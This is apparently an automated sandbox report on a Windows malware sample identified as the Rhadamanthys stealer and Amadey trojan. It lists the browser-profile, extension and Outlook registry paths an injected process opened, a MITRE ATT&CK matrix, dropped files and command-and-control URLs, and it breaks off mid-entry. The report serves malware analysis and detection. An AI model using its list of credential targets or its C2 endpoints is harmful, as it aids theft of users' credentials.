Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\thumbnails	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing\google4	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\trash16598	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\System32\OpenWith.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Jump to behavior

Source: Yara match

File source: Process Memory Space: OpenWith.exe PID: 6736, type: MEMORYSTR

Remote Access Functionality

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 00000010.00000003.2230681896.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2280661154.0000000004720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2201808869.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63B14B8 socket,bind,	20_3_00007DF4B63B14B8
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B637F83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,	20_3_00007DF4B637F83C
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00D10098 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	22_2_00D10098
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00CE2340 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,	22_2_00CE2340
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00D0F3A1 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	22_2_00D0F3A1
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A80098 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	23_2_00A80098
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A52340 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,	23_2_00A52340
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A7F3A1 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	23_2_00A7F3A1
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A80098 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	24_2_00A80098
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A7F3A1 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	24_2_00A7F3A1

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	3 Obfuscated Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	113 Process Injection	1 Software Packing	1 Credentials in Registry	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Scheduled Task/Job	1 DLL Side-Loading	NTDS	39 System Information Discovery	Distributed Component Object Model	21 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	111 Masquerading	LSA Secrets	231 Security Software Discovery	SSH	1 Clipboard Data	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	41 Virtualization/Sandbox Evasion	Cached Domain Credentials	3 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	41 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	113 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Remote System Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
J2NWKU2oJi.exe	20%	Virustotal	Browse
J2NWKU2oJi.exe	21%	ReversingLabs
J2NWKU2oJi.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Yuem.exe	100%	Avira	HEUR/AGEN.1319380
C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	100%	Avira	HEUR/AGEN.1319380
C:\Users\user\AppData\Local\Microsoft\Yuem.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	7%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Yuem.exe	55%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Yuem.exe	53%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	55%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	53%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
https://go.micro	0%	URL Reputation	safe
http://91.202.233.180/g88sks2SaM/index.phpc	0%	Avira URL Cloud	safe
http://91.202.233.180/g88sks2SaM/index.php?scr=19Gf	0%	Avira URL Cloud	safe
https://support.office	0%	Avira URL Cloud	safe
http://91.202.233.180/g88sks2SaM/index.phpodedJdUk	0%	Avira URL Cloud	safe
http://91.202.233.180/g88sks2SaM/index.phpT	0%	Avira URL Cloud	safe
http://91.202.233.180/g88sks2SaM/index.php?scr=19IfYj	0%	Avira URL Cloud	safe
http://91.202.233.180/g88sks2SaM/index.phpsF	0%	Avira URL Cloud	safe
https://support.office	0%	Virustotal		Browse
http://91.202.233.180/g88sks2SaM/index.php	0%	Avira URL Cloud	safe
http://91.202.233.180/g88sks2SaM/index.php	0%	Virustotal		Browse
http://91.202.233.180/g88sks2SaM/index.phpOF	0%	Avira URL Cloud	safe
http://91.202.233.180/g88sks2SaM/index.phps	0%	Avira URL Cloud	safe
http://91.202.233.180/g88sks2SaM/index.php?scr=1	0%	Avira URL Cloud	safe
http://91.202.233.180/g88sks2SaM/index.php?scr=19aeqk	0%	Avira URL Cloud	safe
https://discord.com	0%	Avira URL Cloud	safe
https://support.mic	0%	Avira URL Cloud	safe
https://94.156.10.37:2036/efc85e6acdfc3a785/1evgkhav.3ltvh	0%	Avira URL Cloud	safe
http://91.202.233.180/g88sks2SaM/index.php?scr=1on	0%	Avira URL Cloud	safe
https://discord.com	0%	Virustotal		Browse
http://91.202.233.180/g88sks2SaM/index.php3G	0%	Avira URL Cloud	safe
http://91.202.233.180/g88sks2SaM/index.php?scr=1	0%	Virustotal		Browse
http://91.202.233.180/g88sks2SaM/index.php?scr=1=1	0%	Avira URL Cloud	safe
http://91.202.233.180/g88sks2SaM/index.php?scr=19	0%	Avira URL Cloud	safe
http://91.202.233.180/g88sks2SaM/index.phpded	0%	Avira URL Cloud	safe
https://94.156.10.37:2036/efc85e6acdfc3a785/1evgkhav.3ltvh	0%	Virustotal		Browse
http://91.202.233.180/g88sks2SaM/index.php?scr=1D	0%	Avira URL Cloud	safe
http://91.202.233.180/g88sks2SaM/index.php?scr=17e	0%	Avira URL Cloud	safe
http://91.202.233.180/g88sks2SaM/index.php/	0%	Avira URL Cloud	safe
http://91.202.233.180/g88sks2SaM/index.phpic	0%	Avira URL Cloud	safe
http://91.202.233.180/g88sks2SaM/index.php?scr=19mfuj	0%	Avira URL Cloud	safe
http://91.202.233.180/g88sks2SaM/index.phpoded	0%	Avira URL Cloud	safe
https://94.156.10.37:2036/efc85e6acdfc3a785/1evgkhav.3ltvhkernelbasentdllkernel32GetProcessMitigatio	0%	Avira URL Cloud	safe
https://94.156.10.37:2036/efc85e6acdfc3a785/1evgkhav.3ltvhD	0%	Avira URL Cloud	safe
https://94.156.10.37:2036/efc85e6acdfc3a785/1evgkhav.3ltvhkernelbasentdllkernel32GetProcessMitigatio	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
hnlhrsLvnXQMkLSbq.hnlhrsLvnXQMkLSbq	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://91.202.233.180/g88sks2SaM/index.php	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://91.202.233.180/g88sks2SaM/index.php?scr=1	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp	false		high
http://91.202.233.180/g88sks2SaM/index.phpc	Dctooux.exe, 00000017.00000002.2949713341.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discordapp.com	OpenWith.exe, 00000014.00000003.2387709304.000001BD77943000.00000004.00000020.00020000.00000000.sdmp	false		high
http://91.202.233.180/g88sks2SaM/index.php?scr=19Gf	Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.180/g88sks2SaM/index.phpodedJdUk	Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp	false		high
http://91.202.233.180/g88sks2SaM/index.phpT	Dctooux.exe, 00000017.00000002.2949713341.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	OpenWith.exe, 00000014.00000003.2381455788.000001BD776D5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378601917.000001BD77A00000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2379297840.000001BD77999000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2412338349.000001BD77770000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2386577450.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378806137.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2383846923.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.autoitscript.com/autoit3/	Publication.0.dr	false		high
https://support.office	OpenWith.exe, 00000014.00000003.2379186659.000001BD776D6000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://91.202.233.180/g88sks2SaM/index.phpsF	Dctooux.exe, 00000017.00000002.2949713341.0000000000D67000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e171	OpenWith.exe, 00000014.00000003.2380609962.000001BD776DA000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2382259358.000001BD776DA000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2380401073.000001BD776D4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2384215921.000001BD776E0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2381455788.000001BD776D5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17N-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP	OpenWith.exe, 00000014.00000002.2583923900.000001BD776AA000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2387896301.000001BD776A4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2412273638.000001BD776A8000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2382101034.000001BD776A2000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2436178442.000001BD776AA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://91.202.233.180/g88sks2SaM/index.php?scr=19IfYj	Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	OpenWith.exe, 00000014.00000003.2378645142.000001BD77974000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp	false		high
http://91.202.233.180/g88sks2SaM/index.phps	Dctooux.exe, 00000017.00000002.2949713341.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.180/g88sks2SaM/index.phpOF	Dctooux.exe, 00000017.00000002.2949713341.0000000000D67000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.180/g88sks2SaM/index.php?scr=19aeqk	Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	Pleasure.pif, 0000000A.00000000.1724862263.0000000000219000.00000002.00000001.01000000.00000006.sdmp, Publication.0.dr, Pleasure.pif.1.dr	false		high
https://discord.com	OpenWith.exe, 00000014.00000003.2387709304.000001BD77943000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-21	OpenWith.exe, 00000014.00000003.2436109596.000001BD77774000.00000004.00000020.00020000.00000000.sdmp	false		high
https://go.micro	OpenWith.exe, 00000014.00000002.2583993168.000001BD776C7000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580503855.000001BD776C7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	OpenWith.exe, 00000014.00000003.2378806137.000001BD776C4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2381455788.000001BD776D5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378601917.000001BD77A00000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2379297840.000001BD77999000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2412338349.000001BD77770000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2386577450.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2383846923.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2436178442.000001BD776AA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	J2NWKU2oJi.exe	false		high
https://support.mic	OpenWith.exe, 00000014.00000003.2388299627.000001BD776F8000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2388098872.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp	false		high
https://94.156.10.37:2036/efc85e6acdfc3a785/1evgkhav.3ltvh	dialer.exe, 00000010.00000002.2280099668.00000000027AC000.00000004.00000010.00020000.00000000.sdmp, dialer.exe, 00000010.00000002.2280467763.0000000002E98000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 00000014.00000003.2380401073.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2388372359.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2383846923.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2382259358.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2379080486.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2381455788.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2330137003.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2377146496.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2380016439.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000002.2584550230.000001BD7778C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2376868468.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378806137.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2518893814.000001BD77785000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580212347.000001BD7778B000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2388588718.000001BD77786000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000002.2583114275.000001BD75700000.00000040.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378242743.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 